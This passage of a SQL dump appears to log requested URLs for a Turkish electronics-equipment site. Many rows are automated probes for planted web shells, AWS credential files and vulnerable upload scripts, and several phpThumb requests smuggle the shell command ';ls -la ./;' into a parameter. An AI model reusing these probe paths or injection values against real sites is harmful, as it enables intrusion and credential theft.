00:00:00',301),(28740,'http://3s-technologies.com.tr/tr/mailer.php',NULL,'https://www.google.com','',24,0,'2022-03-19 22:50:42','0000-00-00 00:00:00',301),(28741,'http://3s-technologies.com.tr/tr/marijuana.php',NULL,'https://www.google.com','',153,0,'2022-03-19 22:50:44','0000-00-00 00:00:00',301),(28742,'http://3s-technologies.com.tr/tr/gaza.php',NULL,'https://www.google.com','',11,0,'2022-03-19 22:50:45','0000-00-00 00:00:00',301),(28743,'http://3s-technologies.com.tr/tr/wso1.php',NULL,'https://www.google.com','',40,0,'2022-03-19 22:51:08','0000-00-00 00:00:00',301),(28744,'http://3s-technologies.com.tr/tr/bb.php',NULL,'https://www.google.com','',98,0,'2022-03-19 22:51:17','0000-00-00 00:00:00',301),(28745,'http://3s-technologies.com.tr/tr/haxor.php',NULL,'https://www.google.com','',39,0,'2022-03-19 22:51:24','0000-00-00 00:00:00',301),(28746,'http://3s-technologies.com.tr/tr/assets/plugins/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',6,0,'2022-03-20 11:10:47','0000-00-00 00:00:00',301),(28747,'http://3s-technologies.com.tr/en/wp-load.php',NULL,'www.bing.com','',34,0,'2022-03-21 19:06:12','0000-00-00 00:00:00',301),(28748,'http://3s-technologies.com.tr/en/wp-admin/style.php',NULL,'www.bing.com','',17,0,'2022-03-21 19:08:18','0000-00-00 00:00:00',301),(28749,'http://3s-technologies.com.tr/en/about.php',NULL,'www.bing.com','',208,0,'2022-03-21 19:21:11','0000-00-00 00:00:00',301),(28750,'http://3s-technologies.com.tr/en/shells.php',NULL,'www.bing.com','',26,0,'2022-03-21 19:22:04','0000-00-00 00:00:00',301),(28751,'http://3s-technologies.com.tr/en/olux.php',NULL,'www.bing.com','',17,0,'2022-03-21 19:22:58','0000-00-00 00:00:00',301),(28752,'http://3s-technologies.com.tr/en/xleet.php',NULL,'www.bing.com','',42,0,'2022-03-21 19:23:38','0000-00-00 00:00:00',301),(28753,'http://3s-technologies.com.tr/en/wso.php',NULL,'www.bing.com','',75,0,'2022-03-21 19:24:14','0000-00-00 00:00:00',301),(28754,'http://3s-technologies.com.tr/en/shell.php',NULL,'www.bing.com','',53,0,'2022-03-21 19:24:46','0000-00-00 00:00:00',301),(28755,'http://3s-technologies.com.tr/en/x.php',NULL,'www.bing.com','',62,0,'2022-03-21 19:27:01','0000-00-00 00:00:00',301),(28756,'http://3s-technologies.com.tr/en/z.php',NULL,'www.bing.com','',27,0,'2022-03-21 19:27:54','0000-00-00 00:00:00',301),(28757,'http://3s-technologies.com.tr/en/a.php',NULL,'www.bing.com','',57,0,'2022-03-21 19:28:27','0000-00-00 00:00:00',301),(28758,'http://3s-technologies.com.tr/en/test.php',NULL,'www.bing.com','',59,0,'2022-03-21 19:29:04','0000-00-00 00:00:00',301),(28759,'http://3s-technologies.com.tr/en/wp.php',NULL,'www.bing.com','',188,0,'2022-03-21 19:29:38','0000-00-00 00:00:00',301),(28760,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/rl132-detail?tmpl=component&print=1',NULL,'','',1,0,'2022-03-22 12:51:03','0000-00-00 00:00:00',301),(28761,'http://3s-technologies.com.tr/tr/admin/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',6,0,'2022-03-22 22:57:44','0000-00-00 00:00:00',301),(28762,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84:neoplace&catid=51:neo&itemid=96&lang=tr',NULL,'','',2,0,'2022-03-23 00:49:48','0000-00-00 00:00:00',301),(28763,'http://3s-technologies.com.tr/aws/.credentials',NULL,'','',2,0,'2022-03-23 01:04:49','0000-00-00 00:00:00',301),(28764,'https://3s-technologies.com.tr/aws/.credentials',NULL,'','',2,0,'2022-03-23 01:04:49','0000-00-00 00:00:00',301),(28765,'http://3s-technologies.com.tr/public/.aws/credentials',NULL,'','',1,0,'2022-03-23 07:15:13','0000-00-00 00:00:00',301),(28766,'https://3s-technologies.com.tr/public/.aws/credentials',NULL,'','',1,0,'2022-03-23 07:15:13','0000-00-00 00:00:00',301),(28767,'http://3s-technologies.com.tr/tr/router.php',NULL,'','',2,0,'2022-03-23 10:40:48','0000-00-00 00:00:00',301),(28768,'http://3s-technologies.com.tr/tr/foxwsov1.2.php',NULL,'','',1,0,'2022-03-23 16:06:50','0000-00-00 00:00:00',301),(28769,'http://3s-technologies.com.tr/tr/ffaa531.php',NULL,'','',7,0,'2022-03-23 16:06:52','0000-00-00 00:00:00',301),(28770,'http://3s-technologies.com.tr/tr/components/com_flexicontent/librairies/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la ./;&phpthumbdebug=9',NULL,'','',3,0,'2022-03-23 19:33:28','0000-00-00 00:00:00',301),(28771,'http://3s-technologies.com.tr/tr/components/com_alphacontent/assets/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la ./;&phpthumbdebug=9',NULL,'','',3,0,'2022-03-23 19:33:28','0000-00-00 00:00:00',301),(28772,'http://3s-technologies.com.tr/en/modules/mod_araticlws/mod_araticlws.php',NULL,'www.google.com','',3,0,'2022-03-24 00:40:15','0000-00-00 00:00:00',301),(28773,'http://3s-technologies.com.tr/tr/assets/js/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',4,0,'2022-03-24 07:50:27','0000-00-00 00:00:00',301),(28774,'http://3s-technologies.com.tr/tr/components/com_alphauserpoints/assets/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la ./;&phpthumbdebug=9',NULL,'','',3,0,'2022-03-24 22:47:59','0000-00-00 00:00:00',301),(28775,'http://3s-technologies.com.tr/tr/components/com_hotornot2/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la ./;&phpthumbdebug=9',NULL,'','',3,0,'2022-03-24 22:47:59','0000-00-00 00:00:00',301),(28776,'http://3s-technologies.com.tr/tr/modules/mod_ajaxnews/lib/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la ./;&phpthumbdebug=9',NULL,'','',1,0,'2022-03-25 23:53:27','0000-00-00 00:00:00',301),(28777,'http://3s-technologies.com.tr/en/public/_ignition/health-check',NULL,'http://3s-technologies.com.tr/public/_ignition/health-check/','',4,0,'2022-03-26 04:57:41','0000-00-00 00:00:00',301),(28778,'http://3s-technologies.com.tr/en/laravel/_ignition/health-check',NULL,'http://3s-technologies.com.tr/laravel/_ignition/health-check/','',1,0,'2022-03-26 04:57:42','0000-00-00 00:00:00',301),(28779,'http://3s-technologies.com.tr/tr/components/com_jmultimedia/assets/thumbs/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la ./;&phpthumbdebug=9',NULL,'','',3,0,'2022-03-26 15:25:36','0000-00-00 00:00:00',301),(28780,'http://3s-technologies.com.tr/tr/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/ofc_upload_image.php',NULL,'','',3,0,'2022-03-26 22:51:38','0000-00-00 00:00:00',301),(28781,'http://3s-technologies.com.tr/tr/administrator/components/com_redmystic/chart/tmp-upload-images/ofc_upload_image.php',NULL,'','',3,0,'2022-03-26 22:54:00','0000-00-00 00:00:00',301),(28782,'http://3s-technologies.com.tr/tr/components/com_portfolio/includes/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la ./;&phpthumbdebug=9',NULL,'','',3,0,'2022-03-26 23:13:34','0000-00-00 00:00:00',301),(28783,'https://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/275-k100-1mm-28-detail',NULL,'','',3,0,'2022-03-27 01:27:43','0000-00-00 00:00:00',301),(28784,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/npm-d3a-detail?tmpl=component&print=1',NULL,'','',1,0,'2022-03-27 23:15:21','0000-00-00 00:00:00',301),(28785,'http://3s-technologies.com.tr/en/.tmb/cache/xxo.php?database=shz.php&wordpress=.vacacionesalmaximo.com/xml.txt',NULL,'http://localhost/','',2,0,'2022-03-28 11:50:55','0000-00-00 00:00:00',301),(28786,'http://3s-technologies.com.tr/en/.tmb/cache/shz.php',NULL,'http://localhost/','',4,0,'2022-03-28 11:51:17','0000-00-00 00:00:00',301),(28787,'http://3s-technologies.com.tr/tr/111nocache.php',NULL,'','',3,0,'2022-03-28 20:12:50','0000-00-00 00:00:00',301),(28788,'http://3s-technologies.com.tr/tr/utchiha.php',NULL,'','',15,0,'2022-03-28 20:12:55','0000-00-00 00:00:00',301),(28789,'http://3s-technologies.com.tr/tr/unix.php',NULL,'','',16,0,'2022-03-28 20:13:07','0000-00-00 00:00:00',301),(28790,'http://3s-technologies.com.tr/tr/small.php',NULL,'','',43,0,'2022-03-28 20:13:11','0000-00-00 00:00:00',301),(28791,'http://3s-technologies.com.tr/tr/demo328/fw.php',NULL,'','',15,0,'2022-03-28 20:13:18','0000-00-00 00:00:00',301),(28792,'http://3s-technologies.com.tr/tr/uploads/up.php',NULL,'','',29,0,'2022-03-28 20:13:31','0000-00-00 00:00:00',301),(28793,'http://3s-technologies.com.tr/tr/wp_wrong_datlib.php',NULL,'','',68,0,'2022-03-28 20:13:36','0000-00-00 00:00:00',301),(28794,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-media-list-data.php',NULL,'','',29,0,'2022-03-28 20:13:40','0000-00-00 00:00:00',301),(28795,'http://3s-technologies.com.tr/tr/0byte.php',NULL,'','',61,0,'2022-03-28 20:13:49','0000-00-00 00:00:00',301),(28796,'http://3s-technologies.com.tr/tr/stindex.php',NULL,'','',22,0,'2022-03-28 20:14:24','0000-00-00 00:00:00',301),(28797,'http://3s-technologies.com.tr/tr/sym.php',NULL,'','',27,0,'2022-03-28 20:14:45','0000-00-00 00:00:00',301),(28798,'http://3s-technologies.com.tr/tr/sym403.php',NULL,'','',42,0,'2022-03-28 20:14:52','0000-00-00 00:00:00',301),(28799,'http://3s-technologies.com.tr/tr/dkiz.php',NULL,'','',4,0,'2022-03-28 20:14:53','0000-00-00 00:00:00',301),(28800,'http://3s-technologies.com.tr/tr/xl.php',NULL,'','',61,0,'2022-03-28 20:15:01','0000-00-00 00:00:00',301),(28801,'http://3s-technologies.com.tr/tr/symlink.php',NULL,'','',24,0,'2022-03-28 20:15:03','0000-00-00 00:00:00',301),(28802,'http://3s-technologies.com.tr/tr/xindex.php',NULL,'','',22,0,'2022-03-28 20:15:27','0000-00-00 00:00:00',301),(28803,'http://3s-technologies.com.tr/tr/kindex.php',NULL,'','',16,0,'2022-03-28 20:15:32','0000-00-00 00:00:00',301),(28804,'http://3s-technologies.com.tr/tr/qindex.php',NULL,'','',24,0,'2022-03-28 20:15:47','0000-00-00 00:00:00',301),(28805,'http://3s-technologies.com.tr/tr/403.php',NULL,'','',473,0,'2022-03-28 20:15:56','0000-00-00 00:00:00',301),(28806,'http://3s-technologies.com.tr/tr/i.php',NULL,'','',93,0,'2022-03-28 20:17:51','0000-00-00 00:00:00',301),(28807,'http://3s-technologies.com.tr/tr/p.php',NULL,'','',141,0,'2022-03-28 20:18:03','0000-00-00 00:00:00',301),(28808,'http://3s-technologies.com.tr/tr/q.php',NULL,'','',47,0,'2022-03-28 20:18:06','0000-00-00 00:00:00',301),(28809,'http://3s-technologies.com.tr/tr/g.php',NULL,'','',249,0,'2022-03-28 20:18:20','0000-00-00 00:00:00',301),(28810,'http://3s-technologies.com.tr/tr/h.php',NULL,'','',120,0,'2022-03-28 20:18:22','0000-00-00 00:00:00',301),(28811,'http://3s-technologies.com.tr/tr/j.php',NULL,'','',34,0,'2022-03-28 20:18:26','0000-00-00 00:00:00',301),(28812,'http://3s-technologies.com.tr/tr/l.php',NULL,'','',42,0,'2022-03-28 20:18:43','0000-00-00 00:00:00',301),(28813,'http://3s-technologies.com.tr/tr/v.php',NULL,'','',174,0,'2022-03-28 20:18:50','0000-00-00 00:00:00',301),(28814,'http://3s-technologies.com.tr/tr/n.php',NULL,'','',57,0,'2022-03-28 20:18:54','0000-00-00 00:00:00',301),(28815,'http://3s-technologies.com.tr/tr/foxwso.php',NULL,'','',35,0,'2022-03-28 20:19:19','0000-00-00 00:00:00',301),(28816,'http://3s-technologies.com.tr/tr/wp-wso.php',NULL,'','',44,0,'2022-03-28 20:19:30','0000-00-00 00:00:00',301),(28817,'http://3s-technologies.com.tr/tr/minimo.php',NULL,'','',19,0,'2022-03-28 20:19:42','0000-00-00 00:00:00',301),(28818,'http://3s-technologies.com.tr/tr/www.php',NULL,'','',52,0,'2022-03-28 20:19:55','0000-00-00 00:00:00',301),(28819,'http://3s-technologies.com.tr/tr/777.php',NULL,'','',40,0,'2022-03-28 20:20:03','0000-00-00 00:00:00',301),(28820,'http://3s-technologies.com.tr/tr/xox.php',NULL,'','',22,0,'2022-03-28 20:20:08','0000-00-00 00:00:00',301),(28821,'http://3s-technologies.com.tr/tr/wi.php',NULL,'','',94,0,'2022-03-28 20:20:18','0000-00-00 00:00:00',301),(28822,'http://3s-technologies.com.tr/tr/mar.php',NULL,'','',210,0,'2022-03-28 20:20:23','0000-00-00 00:00:00',301),(28823,'http://3s-technologies.com.tr/tr/nee.php',NULL,'','',12,0,'2022-03-28 20:20:34','0000-00-00 00:00:00',301),(28824,'http://3s-technologies.com.tr/tr/lol.php',NULL,'','',78,0,'2022-03-28 20:20:48','0000-00-00 00:00:00',301),(28825,'http://3s-technologies.com.tr/tr/87.php',NULL,'','',42,0,'2022-03-28 20:20:56','0000-00-00 00:00:00',301),(28826,'http://3s-technologies.com.tr/tr/foxwsov1.php',NULL,'','',14,0,'2022-03-28 20:21:06','0000-00-00 00:00:00',301),(28827,'http://3s-technologies.com.tr/tr/kk.php',NULL,'','',83,0,'2022-03-28 20:21:34','0000-00-00 00:00:00',301),(28828,'http://3s-technologies.com.tr/tr/mrjn.php',NULL,'','',23,0,'2022-03-28 20:21:38','0000-00-00 00:00:00',301),(28829,'http://3s-technologies.com.tr/tr/kn.php',NULL,'','',28,0,'2022-03-28 20:21:41','0000-00-00 00:00:00',301),(28830,'http://3s-technologies.com.tr/tr/3301.php',NULL,'','',23,0,'2022-03-28 20:21:45','0000-00-00 00:00:00',301),(28831,'http://3s-technologies.com.tr/tr/anone.php',NULL,'','',20,0,'2022-03-28 20:22:02','0000-00-00 00:00:00',301),(28832,'http://3s-technologies.com.tr/tr/wp-configer.php',NULL,'','',19,0,'2022-03-28 20:22:09','0000-00-00 00:00:00',301),(28833,'http://3s-technologies.com.tr/tr/wp-ad.php',NULL,'','',22,0,'2022-03-28 20:22:14','0000-00-00 00:00:00',301),(28834,'http://3s-technologies.com.tr/tr/send.php',NULL,'','',52,0,'2022-03-28 20:22:20','0000-00-00 00:00:00',301),(28835,'http://3s-technologies.com.tr/tr/.wp-cache.php',NULL,'','',24,0,'2022-03-28 20:22:23','0000-00-00 00:00:00',301),(28836,'http://3s-technologies.com.tr/tr/sendmail.php',NULL,'','',27,0,'2022-03-28 20:22:27','0000-00-00 00:00:00',301),(28837,'http://3s-technologies.com.tr/tr/rahma.php',NULL,'','',19,0,'2022-03-28 20:22:31','0000-00-00 00:00:00',301),(28838,'http://3s-technologies.com.tr/tr/nasgor.php',NULL,'','',16,0,'2022-03-28 20:22:36','0000-00-00 00:00:00',301),(28839,'http://3s-technologies.com.tr/tr/wp-confirm.php',NULL,'','',16,0,'2022-03-28 20:22:42','0000-00-00 00:00:00',301),(28840,'http://3s-technologies.com.tr/tr/alfa123.php',NULL,'','',26,0,'2022-03-28 20:22:45','0000-00-00 00:00:00',301),(28841,'http://3s-technologies.com.tr/tr/wp-one.php',NULL,'','',17,0,'2022-03-28 20:22:56','0000-00-00 00:00:00',301),(28842,'http://3s-technologies.com.tr/tr/alexus.php',NULL,'','',34,0,'2022-03-28 20:23:00','0000-00-00 00:00:00',301),(28843,'http://3s-technologies.com.tr/tr/wso1337.php',NULL,'','',21,0,'2022-03-28 20:23:04','0000-00-00 00:00:00',301),(28844,'http://3s-technologies.com.tr/tr/blog.php',NULL,'','',100,0,'2022-03-28 20:23:11','0000-00-00 00:00:00',301),(28845,'http://3s-technologies.com.tr/tr/it.php',NULL,'','',21,0,'2022-03-28 20:23:16','0000-00-00 00:00:00',301),(28846,'http://3s-technologies.com.tr/tr/kiss.php',NULL,'','',16,0,'2022-03-28 20:23:22','0000-00-00 00:00:00',301),(28847,'http://3s-technologies.com.tr/tr/wp2.php',NULL,'','',55,0,'2022-03-28 20:23:30','0000-00-00 00:00:00',301),(28848,'http://3s-technologies.com.tr/tr/owl.php',NULL,'','',24,0,'2022-03-28 20:23:32','0000-00-00 00:00:00',301),(28849,'http://3s-technologies.com.tr/tr/ohayo.php',NULL,'','',18,0,'2022-03-28 20:23:40','0000-00-00 00:00:00',301),(28850,'http://3s-technologies.com.tr/tr/cms.php',NULL,'','',20,0,'2022-03-28 20:23:48','0000-00-00 00:00:00',301),(28851,'http://3s-technologies.com.tr/tr/gel.php',NULL,'','',21,0,'2022-03-28 20:23:59','0000-00-00 00:00:00',301),(28852,'http://3s-technologies.com.tr/tr/.fk.php',NULL,'','',19,0,'2022-03-28 20:24:14','0000-00-00 00:00:00',301),(28853,'http://3s-technologies.com.tr/tr/alexuse.php',NULL,'','',8,0,'2022-03-28 20:24:20','0000-00-00 00:00:00',301),(28854,'http://3s-technologies.com.tr/tr/sendemail.php',NULL,'','',19,0,'2022-03-28 20:24:24','0000-00-00 00:00:00',301),(28855,'http://3s-technologies.com.tr/tr/content.php',NULL,'','',321,0,'2022-03-28 20:24:34','0000-00-00 00:00:00',301),(28856,'http://3s-technologies.com.tr/tr/olu.php',NULL,'','',20,0,'2022-03-28 20:24:46','0000-00-00 00:00:00',301),(28857,'http://3s-technologies.com.tr/tr/alexusmailer 2.0.php',NULL,'','',15,0,'2022-03-28 20:24:49','0000-00-00 00:00:00',301),(28858,'http://3s-technologies.com.tr/tr/rss.php',NULL,'','',70,0,'2022-03-28 20:24:55','0000-00-00 00:00:00',301),(28859,'http://3s-technologies.com.tr/tr/alexus-mailer.php',NULL,'','',10,0,'2022-03-28 20:25:00','0000-00-00 00:00:00',301),(28860,'http://3s-technologies.com.tr/tr/wp-confiig.php',NULL,'','',18,0,'2022-03-28 20:25:32','0000-00-00 00:00:00',301),(28861,'http://3s-technologies.com.tr/tr/file-manager.php',NULL,'','',23,0,'2022-03-28 20:25:34','0000-00-00 00:00:00',301),(28862,'http://3s-technologies.com.tr/tr/leafmailer.php',NULL,'','',24,0,'2022-03-28 20:25:40','0000-00-00 00:00:00',301),(28863,'https://3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.8mm-detail/askquestion?tmpl=component',NULL,'','',1,0,'2022-03-28 23:58:45','0000-00-00 00:00:00',301),(28864,'http://3s-technologies.com.tr/tr/assets/backend/plugins/plupload/examples/upload.php',NULL,'','',1,0,'2022-03-30 15:13:59','0000-00-00 00:00:00',301),(28865,'https://3s-technologies.com.tr./tr/.ds_store',NULL,'https://3s-technologies.com.tr./.DS_Store','',2,0,'2022-03-30 15:45:35','0000-00-00 00:00:00',301),(28866,'http://3s-technologies.com.tr/tr/public/assets/plugins/plupload/examples/upload.php',NULL,'','',5,0,'2022-03-31 08:00:51','0000-00-00 00:00:00',301),(28867,'http://3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-kazä±ma-milling',NULL,'','',2,0,'2022-03-31 14:18:49','0000-00-00 00:00:00',301),(28868,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/stencil-washer-eco-detail?tmpl=component&print=1',NULL,'','',1,0,'2022-04-01 22:06:33','0000-00-00 00:00:00',301),(28869,'http://3s-technologies.com.tr/tr/admin/assets/plugins/plupload/examples/upload.php',NULL,'','',5,0,'2022-04-02 04:46:02','0000-00-00 00:00:00',301),(28870,'http://www.3s-technologies.com.tr/tr/_profiler/empty/search/results',NULL,'','',1,0,'2022-04-03 03:17:13','0000-00-00 00:00:00',301),(28871,'http://3s-technologies.com.tr/tr/_profiler/empty/search/results',NULL,'','',7,0,'2022-04-03 03:17:14','0000-00-00 00:00:00',301),(28872,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/stencil-washer-eco-detail/askquestion?tmpl=component',NULL,'','',1,0,'2022-04-03 10:08:14','0000-00-00 00:00:00',301),(28873,'http://3s-technologies.com.tr/tr/assets/admin/plugins/plupload/examples/upload.php',NULL,'','',5,0,'2022-04-04 03:19:52','0000-00-00 00:00:00',301),(28874,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/aqueous?tmpl=component',NULL,'','',2,0,'2022-04-04 10:26:13','0000-00-00 00:00:00',301),(28875,'http://3s-technologies.com.tr/tr/xlet.php',NULL,'','',2,0,'2022-04-04 17:08:41','0000-00-00 00:00:00',301),(28876,'http://3s-technologies.com.tr/tr/sh3llx.php',NULL,'','',3,0,'2022-04-04 17:08:41','0000-00-00 00:00:00',301),(28877,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2022-04-04 23:00:48','0000-00-00 00:00:00',301),(28878,'https://3s-technologies.com.tr/tr/wp-json/wp/v2/users',NULL,'','',2,0,'2022-04-05 02:10:43','0000-00-00 00:00:00',301),(28879,'https://3s-technologies.com.tr/tr//wp-json/wp/v2/users',NULL,'','',1,0,'2022-04-05 02:10:45','0000-00-00 00:00:00',301),(28880,'https://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh2-20-detail/askquestion?tmpl=component',NULL,'','',1,0,'2022-04-05 05:45:28','0000-00-00 00:00:00',301),(28881,'http://3s-technologies.com.tr/tr/file-uploader/server/php/index.php?file=tx2rghf.jpg',NULL,'','',2,0,'2022-04-05 12:38:22','0000-00-00 00:00:00',301),(28882,'http://3s-technologies.com.tr/phpinfo.php',NULL,'','',1,0,'2022-04-05 15:08:23','0000-00-00 00:00:00',301),(28883,'https://3s-technologies.com.tr/phpinfo.php',NULL,'','',1,0,'2022-04-05 15:08:23','0000-00-00 00:00:00',301),(28884,'http://3s-technologies.com.tr/tr/assets/file-uploader/server/php/index.php?file=tx2rghf.jpg',NULL,'','',2,0,'2022-04-07 07:50:44','0000-00-00 00:00:00',301),(28885,'https://3s-technologies.com.tr/en//media/mod_languages/images/en.gif',NULL,'','',2,0,'2022-04-08 14:24:03','0000-00-00 00:00:00',301),(28886,'https://3s-technologies.com.tr/en//media/mod_languages/images/tr.gif',NULL,'','',5,0,'2022-04-08 15:13:37','0000-00-00 00:00:00',301),(28887,'https://3s-technologies.com.tr/en//images/panasonic/panacim-overview.gif',NULL,'','',1,0,'2022-04-08 16:36:28','0000-00-00 00:00:00',301),(28888,'https://3s-technologies.com.tr/en/lead-free-solder/media/mod_languages/images/en.gif',NULL,'','',1,0,'2022-04-08 17:34:46','0000-00-00 00:00:00',301),(28889,'https://3s-technologies.com.tr/en/lead-free-solder/media/mod_languages/images/tr.gif',NULL,'','',1,0,'2022-04-08 18:19:57','0000-00-00 00:00:00',301),(28890,'https://3s-technologies.com.tr/en/home-en/media/mod_languages/images/tr.gif',NULL,'','',1,0,'2022-04-08 22:55:22','0000-00-00 00:00:00',301),(28891,'https://3s-technologies.com.tr/en/home-en/media/mod_languages/images/en.gif',NULL,'','',2,0,'2022-04-09 00:58:58','0000-00-00 00:00:00',301),(28892,'https://3s-technologies.com.tr/en/ahşap-işleme-wood-processing-120cm/media/mod_languages/images/tr.gif',NULL,'','',1,0,'2022-04-09 02:49:52','0000-00-00 00:00:00',301),(28893,'http://3s-technologies.com.tr/en//images/panasonic/panacim-overview.gif',NULL,'','',1,0,'2022-04-09 03:15:18','0000-00-00 00:00:00',301),(28894,'https://3s-technologies.com.tr/en/videos/media/mod_languages/images/tr.gif',NULL,'','',1,0,'2022-04-09 03:17:24','0000-00-00 00:00:00',301),(28895,'http://3s-technologies.com.tr/tr/assets/plugins/file-uploader/server/php/index.php?file=tx2rghf.jpg',NULL,'','',1,0,'2022-04-09 03:36:25','0000-00-00 00:00:00',301),(28896,'https://3s-technologies.com.tr/en/wave-soldering/media/mod_languages/images/en.gif',NULL,'','',1,0,'2022-04-09 05:12:40','0000-00-00 00:00:00',301),(28897,'http://3s-technologies.com.tr/en//media/mod_languages/images/tr.gif',NULL,'','',1,0,'2022-04-09 05:16:19','0000-00-00 00:00:00',301),(28898,'https://3s-technologies.com.tr/tr//media/mod_languages/images/tr.gif',NULL,'','',1,0,'2022-04-09 05:58:16','0000-00-00 00:00:00',301),(28899,'https://3s-technologies.com.tr/en/wave-soldering/media/mod_languages/images/tr.gif',NULL,'','',1,0,'2022-04-09 06:02:51','0000-00-00 00:00:00',301),(28900,'https://3s-technologies.com.tr/tr//media/mod_languages/images/en.gif',NULL,'','',1,0,'2022-04-09 06:15:48','0000-00-00 00:00:00',301),(28901,'http://3s-technologies.com.tr/tr/123/license.txt',NULL,'http://3s-technologies.com.tr/123/license.txt','',1,0,'2022-04-09 06:30:47','0000-00-00 00:00:00',301),(28902,'https://3s-technologies.com.tr/en/about-us/media/mod_languages/images/en.gif',NULL,'','',1,0,'2022-04-09 06:36:13','0000-00-00 00:00:00',301),(28903,'http://3s-technologies.com.tr/en//media/mod_languages/images/en.gif',NULL,'','',1,0,'2022-04-09 06:38:57','0000-00-00 00:00:00',301),(28904,'https://3s-technologies.com.tr/en/contacts/media/mod_languages/images/en.gif',NULL,'','',1,0,'2022-04-09 06:50:04','0000-00-00 00:00:00',301),(28905,'http://3s-technologies.com.tr/tr/js/_system/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',5,0,'2022-04-09 12:08:59','0000-00-00 00:00:00',301),(28906,'http://www.3s-technologies.com.tr/en/filemanager/dialog.php',NULL,'','',1,0,'2022-04-09 19:13:54','0000-00-00 00:00:00',301),(28907,'http://www.3s-technologies.com.tr/en/admin/filemanager/dialog.php',NULL,'','',1,0,'2022-04-09 19:13:58','0000-00-00 00:00:00',301),(28908,'https://www.3s-technologies.com.tr/en/filemanager/dialog.php',NULL,'','',3,0,'2022-04-09 19:14:04','0000-00-00 00:00:00',301),(28909,'https://www.3s-technologies.com.tr/en/admin/filemanager/dialog.php',NULL,'','',3,0,'2022-04-09 19:14:12','0000-00-00 00:00:00',301),(28910,'http://www.3s-technologies.com.tr/tr/mt',NULL,'','',1,0,'2022-04-10 05:27:47','0000-00-00 00:00:00',301),(28911,'http://www.3s-technologies.com.tr/tr/alfa_data/alfacgiapi',NULL,'','',1,0,'2022-04-10 05:27:48','0000-00-00 00:00:00',301),(28912,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/2021/12/up.php',NULL,'','',1,0,'2022-04-10 05:27:50','0000-00-00 00:00:00',301),(28913,'http://www.3s-technologies.com.tr/tr/wp-content/alfa_data/alfacgiapi',NULL,'','',1,0,'2022-04-10 05:27:51','0000-00-00 00:00:00',301),(28914,'http://www.3s-technologies.com.tr/tr/doc.php',NULL,'','',31,0,'2022-04-10 05:27:53','0000-00-00 00:00:00',301),(28915,'http://www.3s-technologies.com.tr/tr/shells.php',NULL,'','',1,0,'2022-04-10 05:27:54','0000-00-00 00:00:00',301),(28916,'http://www.3s-technologies.com.tr/tr/about.php',NULL,'','',32,0,'2022-04-10 05:27:55','0000-00-00 00:00:00',301),(28917,'http://www.3s-technologies.com.tr/tr/wp-admin/alfa.php',NULL,'','',2,0,'2022-04-10 05:27:56','0000-00-00 00:00:00',301),(28918,'http://www.3s-technologies.com.tr/tr/wp-includes/fw.php',NULL,'','',1,0,'2022-04-10 05:27:59','0000-00-00 00:00:00',301),(28919,'http://www.3s-technologies.com.tr/tr/wp-content/fw.php',NULL,'','',4,0,'2022-04-10 05:28:00','0000-00-00 00:00:00',301),(28920,'http://www.3s-technologies.com.tr/tr/wp-admin/fw.php',NULL,'','',1,0,'2022-04-10 05:28:01','0000-00-00 00:00:00',301),(28921,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/2021/12/fw.php',NULL,'','',1,0,'2022-04-10 05:28:02','0000-00-00 00:00:00',301),(28922,'http://www.3s-technologies.com.tr/tr/wp-includes/wso.php',NULL,'','',1,0,'2022-04-10 05:28:04','0000-00-00 00:00:00',301),(28923,'http://www.3s-technologies.com.tr/tr/wp-content/wso.php',NULL,'','',1,0,'2022-04-10 05:28:05','0000-00-00 00:00:00',301),(28924,'http://www.3s-technologies.com.tr/tr/wp-admin/wso.php',NULL,'','',2,0,'2022-04-10 05:28:06','0000-00-00 00:00:00',301),(28925,'http://www.3s-technologies.com.tr/tr/wp-22.php',NULL,'','',4,0,'2022-04-10 05:28:07','0000-00-00 00:00:00',301),(28926,'http://www.3s-technologies.com.tr/tr/alfa.php',NULL,'','',43,0,'2022-04-10 05:28:09','0000-00-00 00:00:00',301),(28927,'http://www.3s-technologies.com.tr/tr/fw.php',NULL,'','',22,0,'2022-04-10 05:28:10','0000-00-00 00:00:00',301),(28928,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'','',1,0,'2022-04-10 05:28:13','0000-00-00 00:00:00',301),(28929,'https://3s-technologies.com.tr/tr/123/license.txt',NULL,'https://3s-technologies.com.tr/123/license.txt','',1,0,'2022-04-10 07:42:07','0000-00-00 